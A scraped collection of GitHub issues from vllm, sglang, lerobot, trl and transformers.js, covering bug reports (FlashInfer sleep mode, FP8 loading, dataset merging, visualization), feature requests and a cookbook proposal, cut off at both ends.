\nThe output of python collect_env.py\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.3 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.3 (main, Nov 6 2025, 13:44:16) [GCC 13.3.0] (64-bit runtime)\nPython platform : Linux-6.14.0-1017-azure-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : GPU 0: NVIDIA H100 NVL\nNvidia driver version : 580.95.05\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 48 bits physical, 48 bits virtual\nByte Order: Little Endian\nCPU(s): 40\nOn-line CPU(s) list: 0-39\nVendor ID: AuthenticAMD\nModel name: AMD EPYC 9V84 96-Core Processor\nCPU family: 25\nModel: 17\nThread(s) per core: 1\nCore(s) per socket: 40\nSocket(s): 1\nStepping: 1\nBogoMIPS: 4800.09\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology tsc_reliable nonstop_tsc cpuid extd_apicid aperfmperf tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm cmp_legacy cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw topoext perfctr_core vmmcall fsgsbase bmi1 avx2 smep bmi2 erms invpcid avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves user_shstk avx512_bf16 clzero xsaveerptr rdpru arat avx512vbmi umip avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq rdpid fsrm\nHypervisor vendor: Microsoft\nVirtualization type: full\nL1d cache: 1.3 MiB (40 instances)\nL1i cache: 1.3 MiB (40 instances)\nL2 cache: 40 MiB (40 instances)\nL3 cache: 160 MiB (5 instances)\nNUMA node(s): 1\nNUMA node0 CPU(s): 0-39\nVulnerability Gather data sampling: Not affected\nVulnerability Ghostwrite: Not affected\nVulnerability Indirect target selection: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Vulnerable: Safe RET, no microcode\nVulnerability Spec store bypass: Vulnerable\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Retpolines; STIBP disabled; RSB filling; PBRSB-eIBRS Not affected; BHI Not affected\nVulnerability Srbds: Not affected\nVulnerability Tsa: Vulnerable: Clear CPU buffers attempted, no microcode\nVulnerability Tsx async abort: Not affected\nVulnerability Vmscape: Not affected\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flashinfer-python==0.5.3\n[pip3] numpy==2.2.6\n[pip3] nvidia-cublas-cu12==12.8.4.1\n[pip3] nvidia-cuda-cupti-cu12==12.8.90\n[pip3] nvidia-cuda-nvrtc-cu12==12.8.93\n[pip3] nvidia-cuda-runtime", "url": "https://github.com/vllm-project/vllm/issues/31019", "state": "open", "labels": [ "bug", "help wanted", "good first issue" ], "created_at": "2025-12-19T09:18:00Z", "updated_at": "2025-12-24T12:16:01Z", "comments": 4, "user": "SorenDreano" }, { "repo": "vllm-project/vllm", "number": 31016, "title": "[Bug]: FlashInfer Incompatible with Sleep Mode", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nHere is a script to reproduce the bug: \nI use vllm=v0.10.1 and flashinfer-python=v0.5.3.\n```\nfrom vllm import LLM, SamplingParams\n\nif __name__ == \"__main__\":\n model_pth = \"xxx/Qwen3-1.7B\" \n tp_size = 1\n llm = LLM(\n model=model_pth, \n enable_sleep_mode=True,\n tensor_parallel_size=tp_size,\n gpu_memory_utilization=0.7, \n )\n\n llm.sleep(level=1)\n llm.wake_up()\n\n prompts = [\n \"What is AI?\", \n \"Where is the Machu Picchu located?\", \n \"What is the capital of France?\",\n \"Who painted the Mona Lisa?\",\n ]\n\n sampling_params = SamplingParams(\n temperature=0.7,\n top_p=0.9,\n max_tokens=64,\n )\n\n outputs = llm.generate(prompts, sampling_params)\n\n for i, out in enumerate(outputs):\n prompt = prompts[i]\n generated = out.outputs[0].text\n print(f\"Prompt {i}: {prompt!r}\")\n print(f\"Generation: {generated}\\n\")\n ```\n\n### Root Cause\nThe bug occurs because the FlashInfer backend\u2019s `attn_metadata` is stateful. It holds a `block_table_arange` tensor that is initialized once and then reused across subsequent calls to `build`:\n\n```python\nself.block_table_arange = torch.arange(\n max_num_pages_per_req,\n dtype=torch.int32,\n device=self.device,\n)\n```\n\nThis `block_table_arange` tensor is allocated in the mempool with the `\"kv_cache\"` tag. It gets discarded after calling `llm.sleep`, but is not recreated when the engine wakes up, which leads to incorrect values and thus wrong outputs.\n\nSpecifically, this will cause bad rollout outputs in VERL using vllm + flashinfer.\n\n### Temporary Fix\nHere is a patch as a temporary workaround. It\u2019s not an ideal solution, but it works:\n\n```python\nfrom vllm.v1.attention.backends.flashinfer import FlashInferMetadataBuilder\nimport torch\n\ndef patch_flashinfer_build():\n old_build = FlashInferMetadataBuilder.build\n\n def new_build(*args, **kwargs):\n self = args[0]\n max_num_pages_per_req = self.block_table_arange.numel()\n self.block_table_arange.copy_(\n torch.arange(\n max_num_pages_per_req,\n device=self.block_table_arange.device,\n dtype=self.block_table_arange.dtype,\n )\n )\n return old_build(*args, **kwargs)\n\n FlashInferMetadataBuilder.build = new_build\n\npatch_flashinfer_build()\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31016", "state": "open", "labels": [ "bug", "help wanted" ], "created_at": "2025-12-19T08:04:19Z", "updated_at": "2025-12-19T23:17:47Z", "comments": 1, "user": "xiaoxiaosuaxuan" }, { "repo": "huggingface/transformers.js", "number": 1490, "title": "Example models for each pipeline", "body": "### Question\n\nRight now, I sorta use the docs and some searches to find good default models for https://workglow.dev/ for each pipeline that transformerjs has to offer. But they are not really the best, either in size or performance.\n\nIt would be great to have a list for each pipeline for fast and effective, best of breed, and a workhorse that is in between. Like a good, better, best.", "url": "https://github.com/huggingface/transformers.js/issues/1490", "state": "open", "labels": [ "question" ], "created_at": "2025-12-19T07:37:16Z", "updated_at": "2025-12-19T17:41:01Z", "user": "sroussey" }, { "repo": "vllm-project/vllm", "number": 31004, "title": "[New Model]: T5Gemma 2", "body": "### The model to consider.\n\nhttps://huggingface.co/collections/google/t5gemma-2\n\n\n### The closest model vllm already supports.\n\n_No response_\n\n### What's your difficulty of supporting the model you want?\n\nI know vLLM dropped encoder-decoder support, but can we bring it back?\n\nhttps://huggingface.co/docs/transformers/model_doc/t5gemma2\nhttps://blog.google/technology/developers/t5gemma-2/\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31004", "state": "open", "labels": [ "new-model" ], "created_at": "2025-12-19T03:55:00Z", "updated_at": "2025-12-20T21:37:34Z", "comments": 1, "user": "ducviet00-h2" }, { "repo": "sgl-project/sglang", "number": 15443, "title": "SGLang Diffusion Cookbook Proposal", "body": "# \ud83c\udfa8 [Community Contribution] Create SGLang Diffusion Models Cookbook\n\n## \ud83c\udfaf Goal\nCreate a comprehensive cookbook for diffusion models in SGLang, demonstrating SGLang's performance advantages for image and video generation workloads.\n\n## \ud83d\udccb Scope\n\n### Models to Cover\n\n**Image Generation:**\n- Flux-1 Dev\n- Flux-2 \n- SDXL-Turbo\n- Qwen Image Edit\n\n**Video Generation:**\n- Wan 2.1\n- Wan 2.2\n\n### Content Structure\n\nEach model section includes:\n1. **Model Introduction**\n - Capabilities and use cases\n - Resolution/quality specifications\n - Style examples and output samples\n - Links to official resources\n\n2. **SGLang Deployment**\n - One-command server launch\n - Client usage example\n - Model-specific optimization tips\n\n3. **Performance Benchmarks**\n - Throughput (images/sec or videos/min)\n - Latency and memory usage\n - Comparison: SGLang vs Diffusers vs ComfyUI\n - Bar charts and scaling analysis\n - Reproducible benchmark scripts\n\n## \ud83d\udce6 Deliverables\n```\ncookbook/diffusion/\n\u251c\u2500\u2500 README.md # Main cookbook\n\u251c\u2500\u2500 examples/ # Usage scripts per model\n\u2502 \u251c\u2500\u2500 flux1_basic.py\n\u2502 \u251c\u2500\u2500 sdxl_turbo.py\n\u2502 \u251c\u2500\u2500 wan21_video.py\n\u2502 \u2514\u2500\u2500 ...\n\u251c\u2500\u2500 benchmarks/\n\u2502 \u251c\u2500\u2500 bench_image.py\n\u2502 \u251c\u2500\u2500 bench_video.py\n\u2502 \u251c\u2500\u2500 compare_backends.py\n\u2502 \u2514\u2500\u2500 run_all.sh\n\u2514\u2500\u2500 assets/\n \u2514\u2500\u2500 output_examples/ # Curated generation examples\n```\n\n## \ud83d\ude80 Timeline\n\n**Phase 1 (Weeks 1-2):** MVP with Flux-1 + SDXL-Turbo \n**Phase 2 (Weeks 3-4):** Add remaining image models \n**Phase 3 (Weeks 5-6):** Video models + comprehensive benchmarks \n\n## \ud83d\udcaa How to Contribute\n\nWe need help with:\n\n### Required Contributors (2-3 people)\n- [ ] **Benchmark Engineer**: Run performance tests on H100/A100\n - Time commitment: ~10 hours/week for 4 weeks\n - Requirements: GPU access, Python proficiency\n \n- [ ] **Documentation Writer**: Create usage examples and guides\n - Time commitment: ~8 hours/week for 4 weeks\n - Requirements: Technical writing, SGLang familiarity\n\n- [ ] **Visual Designer** (optional): Curate output examples\n - Time commitment: ~5 hours/week for 2 weeks\n - Requirements: Eye for quality, prompt engineering\n\n### Hardware Requirements\n- H100 (80GB) - primary testing platform\n- A100 (40GB) - secondary platform (optional)\n- Access via cloud providers acceptable (AWS/Lambda/RunPod)\n\n## \ud83d\udcdd Contribution Process\n\n1. **Comment below** if interested (mention which role)\n2. **Join discussion** on implementation details\n3. **Fork repo** and work on assigned section\n4. **Submit PR** following SGLang cookbook standards\n5. **Iterate** based on review feedback\n\n## \ud83d\udd17 References\n\n- [SGLang Cookbook Template](https://cookbook.sglang.io/)\n- [DeepSeek-V3 Example](https://cookbook.sglang.io/docs/DeepSeek/DeepSeek-V3_2)\n- [Wan 2.1 GitHub](https://github.com/Wan-Video/Wan2.1)\n- [SGLang Documentation](https://docs.sglang.ai/)\n\n## \u2753 Questions?\n\n**Q: I only have consumer GPUs (4090/3090), can I help?** \nA: Yes! You can help with documentation, examples, or testing the 1.3B Wan model. You can reach out @Richardczl98 for requesting additional GPUs\n\n**Q: Which video model should we prioritize first?** \nA: Wan 2.1 - it's the most mature open-source option.\n\n**Q: Do I need to know SGLang internals?** \nA: No, just familiarity with diffusion models and Python.\n\n---\n\n**Ready to contribute?** Drop a comment below! \ud83d\ude80\n\ncc @mickqian @Qiaolin-Yu @yhyang201 ", "url": "https://github.com/sgl-project/sglang/issues/15443", "state": "open", "labels": [], "created_at": "2025-12-19T03:44:33Z", "updated_at": "2025-12-23T13:09:31Z", "comments": 1, "user": "Richardczl98" }, { "repo": "vllm-project/vllm", "number": 30969, "title": "[Bug]: SmolLM3-3B FP8 Fails to Load [`compressed-tensors` and `transformers-impl` compatibility issue]", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\nRunning in official Docker image: vllm/vllm-openai:v0.11.1\nGPU: NVIDIA L4 (GCP g2-standard-8)\n`| NVIDIA-SMI 570.195.03 Driver Version: 570.195.03 CUDA Version: 12.9 |`\nvLLM version: 0.11.1\n\n```text\n0.11.1\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nvLLM v0.11.1 fails to load SmolLM3-3B FP8 quantized models with llm-compressor using compressed-tensors.\nSame models work on v0.11.0.\n\nTested with:\n- [huggingface.co/RedHatAI/SmolLM3-3B-FP8-dynamic](https://huggingface.co/RedHatAI/SmolLM3-3B-FP8-dynamic)\n- Manually quantized fine tuned [SmolLM3-3B](https://huggingface.co/HuggingFaceTB/SmolLM3-3B) using llmcompressor==0.7 (compressed-tensors==0.12.2) in FP8-dynamic\n- Manually quantized fine tuned [SmolLM3-3B(https://huggingface.co/HuggingFaceTB/SmolLM3-3B) using llmcompressor==0.8.1 (compressed-tensors==0.12.2) in FP8-dynamic\n\nAll fail on v0.11.1.\nAll work on v0.11.0.\n\nError occurs during model loading in find_matched_target function.\nThe error is: \"Unable to find matching target for model.layers.0.self_attn.q_proj in the compressed-tensors config\"\n\nComplete error\n```\n+ exec python3 -m vllm.entrypoints.openai.api_server --model RedHatAI/SmolLM3-3B-FP8-dynamic --port 8000 --trust-remote-code --max-model-len 5000\n[APIServer pid=1] INFO 12-12 05:05:29 [api_server.py:1772] vLLM API server version 0.11.1\n[APIServer pid=1] INFO 12-12 05:05:29 [utils.py:253] non-default args: {'model': 'RedHatAI/SmolLM3-3B-FP8-dynamic', 'trust_remote_code': True, 'max_model_len': 5000}\n[APIServer pid=1] The argument `trust_remote_code` is to be used with Auto classes. It has no effect here and is ignored.\n[APIServer pid=1] INFO 12-12 05:05:40 [model.py:637] Resolved architecture: SmolLM3ForCausalLM\n[APIServer pid=1] INFO 12-12 05:05:40 [model.py:1750] Using max model len 5000\n[APIServer pid=1] INFO 12-12 05:05:42 [scheduler.py:228] Chunked prefill is enabled with max_num_batched_tokens=2048.\n[EngineCore_DP0 pid=37] INFO 12-12 05:05:54 [core.py:93] Initializing a V1 LLM engine (v0.11.1) with config: model='RedHatAI/SmolLM3-3B-FP8-dynamic', quantization=compressed-tensors\n[EngineCore_DP0 pid=37] INFO 12-12 05:05:55 [parallel_state.py:1200] world_size=1 rank=0 local_rank=0 distributed_init_method=tcp://10.111.66.205:48123 backend=nccl\n[EngineCore_DP0 pid=37] INFO 12-12 05:05:55 [parallel_state.py:1408] rank 0 in world size 1 is assigned as DP rank 0, PP rank 0, PCP rank 0, TP rank 0, EP rank 0\n[EngineCore_DP0 pid=37] INFO 12-12 05:05:55 [gpu_model_runner.py:3467] Starting to load model RedHatAI/SmolLM3-3B-FP8-dynamic...\n[EngineCore_DP0 pid=37] INFO 12-12 05:05:56 [base.py:121] Using Transformers modeling backend.\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] EngineCore failed to start.\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] Traceback (most recent call last):\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/engine/core.py\", line 834, in run_engine_core\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] engine_core = EngineCoreProc(*args, **kwargs)\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/engine/core.py\", line 610, in __init__\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/engine/core.py\", line 102, in __init__\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] super().__init__(\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/executor/abstract.py\", line 101, in __init__\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] self.model_executor = executor_class(vllm_config)\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/executor/uniproc_executor.py\", line 48, in _init_executor\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] self._init_executor()\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/worker/gpu_worker.py\", line 273, in load_model\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] self.driver_worker.load_model()\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/worker/gpu_model_runner.py\", line 3484, in load_model\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] self.model_runner.load_model(eep_scale_up=eep_scale_up)\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] File \"/usr/local/lib/python3.12/dist-packages/vllm/model_executor/model_loader/base_loader.py\", line 49, in load_model\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] self.model = model_loader.load_model(\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [cor", "url": "https://github.com/vllm-project/vllm/issues/30969", "state": "closed", "labels": [ "bug", "help wanted", "good first issue" ], "created_at": "2025-12-18T14:36:30Z", "updated_at": "2025-12-20T21:54:47Z", "comments": 3, "user": "GauthierRoy" }, { "repo": "huggingface/lerobot", "number": 2680, "title": "Invalid frame index when training on merged datasets [RuntimeError]", "body": "### Ticket Type\n\n\ud83d\udc1b Bug Report (Something isn't working)\n\n### Environment & System Info\n\n```Shell\n- LeRobot version: 0.4.3\n- Platform: Linux-5.4.0-165-generic-x86_64-with-glibc2.35\n- Python version: 3.10.12\n- Huggingface Hub version: 0.35.3\n- Datasets version: 4.1.1\n- Numpy version: 2.2.6\n- FFmpeg version: 4.4.2-0ubuntu0.22.04.1\n- PyTorch version: 2.7.1+cu126\n- Is PyTorch built with CUDA support?: True\n- Cuda version: 12.6\n- GPU model: Quadro RTX 6000\n- Using GPU in script?: \n- lerobot scripts: ['lerobot-calibrate', 'lerobot-dataset-viz', 'lerobot-edit-dataset', 'lerobot-eval', 'lerobot-find-cameras', 'lerobot-find-joint-limits', 'lerobot-find-port', 'lerobot-imgtransform-viz', 'lerobot-info', 'lerobot-record', 'lerobot-replay', 'lerobot-setup-motors', 'lerobot-teleoperate', 'lerobot-train']\n```\n\n### Description\n\nI'm having a problem when training a VLA with `lerobot-train` on a merged dataset.\nI'm aware of the issue #2627 as well as PR #2550 that is supposed to fix the bug.\nHowever, the problem is still occurring on the latest commit (4a151a9) of lerobot 0.4.3.\n\nThe dataset has been merged with the following script:\n`lerobot-edit-dataset \\\n --repo_id whosricky/so101-megamix-v1 \\\n --operation.type merge \\\n --operation.repo_ids \"['whosricky/so101_pick_red_cube_3cams', 'whosricky/so101_pick_blue_cube_3cams', 'whosricky/so101_pick_yellow_cube_3cams', 'whosricky/so101_pick_cube_reasoning_3cams', 'whosricky/so101_stacking_3cams', 'whosricky/so101_pickplace_red_cube_3cams', 'whosricky/so101_pickplace_all_red_cubes_3cams', 'whosricky/so101_sorting_cubes_3cams', 'whosricky/so101_pickplace_red_cubes_random_bowl_3cams']\" \\\n --push_to_hub true `\n\nTraining on the single datasets works flawlessly. Training on the merged dataset results in an error.\n\nThe problematic sample seems to be #51 of \"whosricky/so101_pick_blue_cube_3cams\" due to the timestamp exceeding the default tolerance_s. \nHowever, the problem occurs only on the merged dataset and not on the single one.\n\n### Context & Reproduction\n\n```\nlerobot-train \\\n --dataset.repo_id=whosricky/so101-megamix-v1 \\\n --output_dir=outputs_xvla_megamix_v1/train/my_xvla \\\n --job_name=xvla_training_megamix_v1 \\\n --policy.path=lerobot/xvla-base \\\n --policy.repo_id=whosricky/xvla-so101-megamix-v1 \\\n --policy.private=true \\\n --policy.dtype=bfloat16 \\\n --num_workers=8 \\\n --batch_size=8 \\\n --steps=30000 \\\n --eval_freq=5000 \\\n --log_freq=100 \\\n --save_freq=5000 \\\n --policy.device=cuda \\\n --policy.freeze_vision_encoder=false \\\n --policy.freeze_language_encoder=false \\\n --policy.train_policy_transformer=true \\\n --policy.train_soft_prompts=true \\\n --policy.action_mode=auto \\\n --policy.num_image_views=3 \\\n --policy.empty_cameras=0 \\\n --rename_map='{\"observation.images.top\": \"observation.images.image\", \"observation.images.gripper\": \"observation.images.image2\", \"observation.images.front\": \"observation.images.empty_camera_0\"}' \\\n --wandb.enable=true\n```\n\n### Relevant logs or stack trace\n\n```Shell\nWARNING:accelerate.utils.other:Detected kernel version 5.4.0, which is below the recommended minimum of 5.5.0; this can cause the process to hang. It is recommended to upgrade the kernel to the minimum version or higher.\nINFO 2025-12-18 12:38:22 ot_train.py:164 {'batch_size': 8,\n 'checkpoint_path': None,\n 'dataset': {'episodes': None,\n 'image_transforms': {'enable': False,\n 'max_num_transforms': 3,\n 'random_order': False,\n 'tfs': {'affine': {'kwargs': {'degrees': [-5.0,\n 5.0],\n 'translate': [0.05,\n 0.05]},\n 'type': 'RandomAffine',\n 'weight': 1.0},\n 'brightness': {'kwargs': {'brightness': [0.8,\n 1.2]},\n 'type': 'ColorJitter',\n 'weight': 1.0},\n 'contrast': {'kwargs': {'contrast': [0.8,\n 1.2]},\n 'type': 'ColorJitter',\n 'weight': 1.0},\n 'hue': {'kwargs': {'hue': [-0.05,\n 0.05]},\n 'type': 'ColorJitter',\n 'weight': 1.0},\n 'saturation': {'kwargs': {'satur", "url": "https://github.com/huggingface/lerobot/issues/2680", "state": "open", "labels": [ "bug", "question", "dataset", "visualization", "examples", "training" ], "created_at": "2025-12-18T13:29:50Z", "updated_at": "2025-12-26T06:26:37Z", "user": "RiccardoIzzo" }, { "repo": "huggingface/trl", "number": 4719, "title": "Loss calculation of `GKDTrainer` may be inaccurate when performing gradient accumulation?", "body": "It seems that `GKDTrainer` averages the loss of tokens in a micro batch ahead?\n\nhttps://github.com/huggingface/trl/blob/8918c9836a3e0b43a6851c08d01b69072f56ca52/trl/experimental/gkd/gkd_trainer.py#L284", "url": "https://github.com/huggingface/trl/issues/4719", "state": "open", "labels": [ "\ud83d\udc1b bug", "\ud83c\udfcb GKD" ], "created_at": "2025-12-18T12:50:05Z", "updated_at": "2025-12-18T12:50:49Z", "comments": 0, "user": "jue-jue-zi" }, { "repo": "huggingface/lerobot", "number": 2679, "title": "Merging datasets removes fps from scalar features", "body": "### Ticket Type\n\n\ud83d\udc1b Bug Report (Something isn't working)\n\n### Environment & System Info\n\n```Shell\n- LeRobot version: 0.4.3\n- Platform: Linux-6.17.9-arch1-1-x86_64-with-glibc2.42\n- Python version: 3.12.11\n- Huggingface Hub version: 0.34.4\n- Datasets version: 4.1.1\n- Numpy version: 2.3.5\n- FFmpeg version: n8.0.1\n- PyTorch version: 2.7.1+cu128\n- Is PyTorch built with CUDA support?: True\n- Cuda version: 12.8\n- GPU model: NVIDIA GeForce RTX 5090 Laptop GPU\n- Using GPU in script?: \n- lerobot scripts: ['lerobot-calibrate', 'lerobot-dataset-viz', 'lerobot-edit-dataset', 'lerobot-eval', 'lerobot-find-cameras', 'lerobot-find-joint-limits', 'lerobot-find-port', 'lerobot-imgtransform-viz', 'lerobot-info', 'lerobot-record', 'lerobot-replay', 'lerobot-setup-motors', 'lerobot-teleoperate', 'lerobot-train']\n```\n\n### Description\n\nWhen using the `merge_datasets` function, the fps attribute is removed from the scalar features in the dataset. Below are the scalar features from dataset.meta.features of a dataset before and after merging\n\nBefore:\n```\n'timestamp': {'dtype': 'float32', 'shape': (1,), 'names': None, 'fps': 10}, \n'frame_index': {'dtype': 'int64', 'shape': (1,), 'names': None, 'fps': 10}, \n'episode_index': {'dtype': 'int64', 'shape': (1,), 'names': None, 'fps': 10}, \n'index': {'dtype': 'int64', 'shape': (1,), 'names': None, 'fps': 10}, \n'task_index': {'dtype': 'int64', 'shape': (1,), 'names': None, 'fps': 10}}\n```\n\nAfter:\n```\n'timestamp': {'dtype': 'float32', 'shape': (1,), 'names': None}, \n'frame_index': {'dtype': 'int64', 'shape': (1,), 'names': None}, \n'episode_index': {'dtype': 'int64', 'shape': (1,), 'names': None}, \n'index': {'dtype': 'int64', 'shape': (1,), 'names': None}, \n'task_index': {'dtype': 'int64', 'shape': (1,), 'names': None}\n```\n\nThis creates subsequent problems when trying to add an additional dataset to a merged output as the feature mismatch will cause an error to be thrown \n\n### Context & Reproduction\n\nRunning the script below shows the features change before and after the merge\n\n```\nfrom lerobot.datasets.dataset_tools import split_dataset, merge_datasets\nfrom lerobot.datasets.lerobot_dataset import LeRobotDataset\nfrom pprint import pprint\n\ndataset = LeRobotDataset(\"lerobot/pusht\")\nfeat_1 = dataset.meta.features\nsplits = split_dataset(dataset, splits={\"train\": 0.8, \"val\": 0.2})\nmerged = merge_datasets([splits[\"train\"], splits[\"val\"]], output_repo_id=\"lerobot/pusht_merged\")\nfeat_2 = merged.meta.features\n\nprint(\"Features of original dataset:\")\npprint(feat_1)\nprint(\"Features of merged dataset:\")\npprint(feat_2)\n```\n\n### Relevant logs or stack trace\n\n```Shell\nFeatures of original dataset:\n{'action': {'dtype': 'float32',\n 'fps': 10.0,\n 'names': {'motors': ['motor_0', 'motor_1']},\n 'shape': (2,)},\n 'episode_index': {'dtype': 'int64', 'fps': 10.0, 'names': None, 'shape': (1,)},\n 'frame_index': {'dtype': 'int64', 'fps': 10.0, 'names': None, 'shape': (1,)},\n 'index': {'dtype': 'int64', 'fps': 10.0, 'names': None, 'shape': (1,)},\n 'next.done': {'dtype': 'bool', 'fps': 10.0, 'names': None, 'shape': (1,)},\n 'next.reward': {'dtype': 'float32', 'fps': 10.0, 'names': None, 'shape': (1,)},\n 'next.success': {'dtype': 'bool', 'fps': 10.0, 'names': None, 'shape': (1,)},\n 'observation.image': {'dtype': 'video',\n 'names': ['height', 'width', 'channel'],\n 'shape': (96, 96, 3),\n 'video_info': {'has_audio': False,\n 'video.codec': 'av1',\n 'video.fps': 10.0,\n 'video.is_depth_map': False,\n 'video.pix_fmt': 'yuv420p'}},\n 'observation.state': {'dtype': 'float32',\n 'fps': 10.0,\n 'names': {'motors': ['motor_0', 'motor_1']},\n 'shape': (2,)},\n 'task_index': {'dtype': 'int64', 'fps': 10.0, 'names': None, 'shape': (1,)},\n 'timestamp': {'dtype': 'float32', 'fps': 10.0, 'names': None, 'shape': (1,)}}\nFeatures of merged dataset:\n{'action': {'dtype': 'float32',\n 'fps': 10.0,\n 'names': {'motors': ['motor_0', 'motor_1']},\n 'shape': (2,)},\n 'episode_index': {'dtype': 'int64', 'names': None, 'shape': (1,)},\n 'frame_index': {'dtype': 'int64', 'names': None, 'shape': (1,)},\n 'index': {'dtype': 'int64', 'names': None, 'shape': (1,)},\n 'next.done': {'dtype': 'bool', 'fps': 10.0, 'names': None, 'shape': (1,)},\n 'next.reward': {'dtype': 'float32', 'fps': 10.0, 'names': None, 'shape': (1,)},\n 'next.success': {'dtype': 'bool', 'fps': 10.0, 'names': None, 'shape': (1,)},\n 'observation.image': {'dtype': 'video',\n 'names': ['height', 'width', 'channel'],\n 'shape': (96, 96, 3),\n 'video_info': {'has_audio': False,\n 'video.codec': 'av1',\n 'video.fps': 10.0,\n ", "url": "https://github.com/huggingface/lerobot/issues/2679", "state": "open", "labels": [ "bug", "enhancement", "question", "dataset", "performance", "examples" ], "created_at": "2025-12-18T12:47:14Z", "updated_at": "2025-12-18T15:25:12Z", "user": "reeceomahoney" }, { "repo": "vllm-project/vllm", "number": 30956, "title": "[Feature]: could output the given format logger ?", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nhi,dear ,\ni have def the logger from py scripts ,etc, logger_utils.py \nand could i use shell run the command with the logger,\nsuch as ,\n`vllm serve qwen3-embedding-0.6b --logger_file logger_utils.py `\n\n\nthx \ni really need your help \nSOS ,thx \n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30956", "state": "open", "labels": [ "feature request" ], "created_at": "2025-12-18T09:35:22Z", "updated_at": "2025-12-19T01:52:41Z", "comments": 5, "user": "ucas010" }, { "repo": "huggingface/lerobot", "number": 2678, "title": "Bug: lerobot-dataset-viz IndexError when visualizing specific episodes", "body": "# Bug Report: `lerobot-dataset-viz` IndexError when visualizing specific episodes\n\n## Description\n\nThe `lerobot-dataset-viz` command fails with an `IndexError` when trying to visualize a specific episode using the `--episode-index` parameter. The issue is caused by `EpisodeSampler` using global dataset indices while the dataset has been filtered to contain only the specified episode.\n\n## Error Message\n\n```\nIndexError: Invalid key: 180 is out of bounds for size 180\n```\n\nFull traceback:\n```\nTraceback (most recent call last):\n File \"/path/to/lerobot/scripts/lerobot_dataset_viz.py\", line 289, in main\n visualize_dataset(dataset, **vars(args))\n File \"/path/to/lerobot/scripts/lerobot_dataset_viz.py\", line 148, in visualize_dataset\n for batch in tqdm.tqdm(dataloader, total=len(dataloader)):\n ...\n File 